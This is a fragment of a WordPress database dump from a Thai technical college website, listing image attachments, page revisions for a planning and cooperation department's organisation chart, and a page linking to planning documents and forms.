(1629, 3, '2018-03-07 14:17:43', '2018-03-07 07:17:43', '<img class=\"aligncenter size-full wp-image-1623\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"363\" height=\"98\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1626\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46-235x300.jpg\" alt=\"\" width=\"235\" height=\"300\" />\r\n\r\n \r\n\r\n ', 'งานประชาสัมพันธ์', '', 'inherit', 'closed', 'closed', '', '1582-revision-v1', '', '', '2018-03-07 14:17:43', '2018-03-07 07:17:43', '', 1582, 'http://www.technicrayong.ac.th/1582-revision-v1/', 0, 'revision', '', 0),
(1631, 3, '2018-03-07 14:38:29', '2018-03-07 07:38:29', '', '7-3-2561 14-39-06', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-39-06', '', '', '2018-03-07 14:38:29', '2018-03-07 07:38:29', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(1632, 3, '2018-03-07 14:38:35', '2018-03-07 07:38:35', '', '7-3-2561 14-34-46', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-34-46', '', '', '2018-03-07 14:38:35', '2018-03-07 07:38:35', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(1633, 3, '2018-03-07 14:38:37', '2018-03-07 07:38:37', '', '7-3-2561 14-39-27', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-39-27', '', '', '2018-03-07 14:38:37', '2018-03-07 07:38:37', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(1635, 3, '2018-03-07 14:42:08', '2018-03-07 07:42:08', '', '7-3-2561 14-43-12', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-43-12', '', '', '2018-03-07 14:42:08', '2018-03-07 07:42:08', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-43-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(1637, 3, '2018-03-07 14:43:20', '2018-03-07 07:43:20', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1634 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-38-41.jpg\" alt=\"\" width=\"245\" height=\"303\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1636 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-40.jpg\" alt=\"\" width=\"240\" height=\"299\" />', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 14:43:20', '2018-03-07 07:43:20', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1638, 3, '2018-03-07 14:48:43', '2018-03-07 07:48:43', '', '7-3-2561 14-49-01', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-49-01', '', '', '2018-03-07 14:48:43', '2018-03-07 07:48:43', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(1639, 3, '2018-03-07 14:48:47', '2018-03-07 07:48:47', '', '7-3-2561 14-49-18', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-49-18', '', '', '2018-03-07 14:48:47', '2018-03-07 07:48:47', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-49-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(1641, 3, '2018-03-07 14:49:52', '2018-03-07 07:49:52', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1634 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-38-41.jpg\" alt=\"\" width=\"245\" height=\"303\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1636 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-40.jpg\" alt=\"\" width=\"240\" height=\"299\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1640 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-50-12.jpg\" alt=\"\" width=\"189\" height=\"298\" />\r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 14:49:52', '2018-03-07 07:49:52', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1642, 3, '2018-03-07 14:56:18', '2018-03-07 07:56:18', '', '7-3-2561 14-57-37', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-57-37', '', '', '2018-03-07 14:56:18', '2018-03-07 07:56:18', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg', 0, 'attachment', 'image/jpeg', 0),
(1643, 3, '2018-03-07 14:56:22', '2018-03-07 07:56:22', '', '7-3-2561 14-53-30', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-53-30', '', '', '2018-03-07 14:56:22', '2018-03-07 07:56:22', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-53-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(1645, 3, '2018-03-07 14:57:18', '2018-03-07 07:57:18', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1634 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-38-41.jpg\" alt=\"\" width=\"245\" height=\"303\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1636 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-40.jpg\" alt=\"\" width=\"240\" height=\"299\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1640 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-50-12.jpg\" alt=\"\" width=\"189\" height=\"298\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1644 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-52.jpg\" alt=\"\" width=\"201\" height=\"299\" />\r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 14:57:18', '2018-03-07 07:57:18', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1646, 3, '2018-03-07 15:03:36', '2018-03-07 08:03:36', '', '7-3-2561 15-01-21', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-01-21', '', '', '2018-03-07 15:03:36', '2018-03-07 08:03:36', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1647, 3, '2018-03-07 15:03:42', '2018-03-07 08:03:42', '', '7-3-2561 15-01-34', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-01-34', '', '', '2018-03-07 15:03:42', '2018-03-07 08:03:42', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-01-34.jpg', 0, 'attachment', 'image/jpeg', 0),
(1648, 3, '2018-03-07 15:03:43', '2018-03-07 08:03:43', '', '7-3-2561 15-05-03', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-05-03', '', '', '2018-03-07 15:03:43', '2018-03-07 08:03:43', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(1649, 3, '2018-03-07 15:05:48', '2018-03-07 08:05:48', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1634 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-38-41.jpg\" alt=\"\" width=\"250\" height=\"309\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1636 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-40.jpg\" alt=\"\" width=\"247\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1640 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-50-12.jpg\" alt=\"\" width=\"196\" height=\"309\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1644 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-52.jpg\" alt=\"\" width=\"203\" height=\"302\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 15:05:48', '2018-03-07 08:05:48', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1650, 3, '2018-03-07 15:20:31', '2018-03-07 08:20:31', '', '7-3-2561 15-21-54', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-21-54', '', '', '2018-03-07 15:20:31', '2018-03-07 08:20:31', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-21-54.jpg', 0, 'attachment', 'image/jpeg', 0),
(1652, 3, '2018-03-07 15:21:14', '2018-03-07 08:21:14', '', '7-3-2561 15-22-50', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-22-50', '', '', '2018-03-07 15:21:14', '2018-03-07 08:21:14', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(1653, 3, '2018-03-07 15:21:53', '2018-03-07 08:21:53', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1634 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-38-41.jpg\" alt=\"\" width=\"250\" height=\"309\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1636 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-40.jpg\" alt=\"\" width=\"247\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1640 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-50-12.jpg\" alt=\"\" width=\"196\" height=\"309\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1644 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-52.jpg\" alt=\"\" width=\"203\" height=\"302\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1651 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-30.jpg\" alt=\"\" width=\"543\" height=\"317\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 15:21:53', '2018-03-07 08:21:53', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1654, 3, '2018-03-07 15:26:13', '2018-03-07 08:26:13', '', '7-3-2561 15-24-55', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-24-55', '', '', '2018-03-07 15:26:13', '2018-03-07 08:26:13', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(1655, 3, '2018-03-07 15:26:26', '2018-03-07 08:26:26', '', '7-3-2561 15-25-12', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-25-12', '', '', '2018-03-07 15:26:26', '2018-03-07 08:26:26', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(1656, 3, '2018-03-07 15:27:25', '2018-03-07 08:27:25', '', '7-3-2561 15-25-57', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-25-57', '', '', '2018-03-07 15:27:25', '2018-03-07 08:27:25', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-25-57.jpg', 0, 'attachment', 'image/jpeg', 0),
(1657, 3, '2018-03-07 15:27:38', '2018-03-07 08:27:38', '', '7-3-2561 15-26-35', '', 'inherit', 'closed', 'closed', '', '7-3-2561-15-26-35', '', '', '2018-03-07 15:27:38', '2018-03-07 08:27:38', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-15-26-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(1658, 3, '2018-03-07 15:28:07', '2018-03-07 08:28:07', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1651 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-30.jpg\" alt=\"\" width=\"543\" height=\"317\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 15:28:07', '2018-03-07 08:28:07', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1659, 3, '2018-03-08 10:49:20', '2018-03-08 03:49:20', '<img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">แผนปฏิบัติราชการ</span></a></h3>\r\n<h3><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">แผนพัฒนาสถานศึกษา </span></a></h3>\r\n<h3><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h3>\r\n<h3><a href=\"/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h3>\r\n<h3><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">ปฏิทินปฏิบัติงาน</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2020/11/แบบฟอร์ม-สผ.งาน.doc\"><span style=\"color: #0000ff;\">แบบฟอร์ม-สผ.งาน</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2020/11/แบบฟอร์ม-สผ.แผนก.doc\"><span style=\"color: #0000ff;\">แบบฟอร์ม-สผ.แผนก</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">แบบฟอร์มโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h3>\r\n<h3></h3>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและงบประมาณ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93', '', '', '2020-11-04 10:11:17', '2020-11-04 03:11:17', '', 0, 'http://www.technicrayong.ac.th/?page_id=1659', 0, 'page', '', 0),
(1660, 3, '2018-03-08 10:49:20', '2018-03-08 03:49:20', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 10:49:20', '2018-03-08 03:49:20', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
